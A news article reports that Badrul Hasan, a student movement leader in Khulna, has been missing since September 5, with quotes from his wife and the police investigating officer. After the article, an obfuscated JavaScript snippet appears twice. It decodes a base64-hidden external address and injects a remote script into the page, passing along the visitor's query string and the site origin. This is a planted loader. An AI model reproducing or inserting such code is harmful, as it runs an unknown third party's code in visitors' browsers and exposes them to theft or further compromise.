Badrul Hasan, a prominent leader of the anti-discrimination student movement in Khulna, has been missing for the last three days, leaving his family deeply concerned.
A general diary (GD) has already been filed at Sonadanga Model Police Station in Khulna, but the police are yet to locate him.
Badrul’s wife, Sayeda Khatun, held a press conference at Khulna Press Club on Saturday, where she shared that her husband had left
home on September 5 and has been missing since.
“After he left, I last spoke with him over the phone at 7 pm that day. Badrul said, ‘I am busy with relief work.
I’ll be home soon.’ But he never returned. I called again after 11 pm, but he didn’t pick up, and since then, his phone has been switched off,” she added.
Sayeda Khatun explained that they reside in Sonarbangla Gali in Ward No. 18 of Khulna city.
Badrul is an honors final-year student at Govt. Haji Muhammad Mohsin College and works part-time at a diagnostic center.
“He was very active in the recent student movement. With the flood situation worsening, he had been collecting relief for those in need,” she said.
In response to inquiries, Aminul Islam, the investigating officer at Sonadanga Police Station, said, “We haven’t found any leads yet.”
He added, “All possible locations have been searched, and his phone was last traced to the area where he was involved in relief work around 9:30 pm that day. We are doing everything we can to find him.”(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();
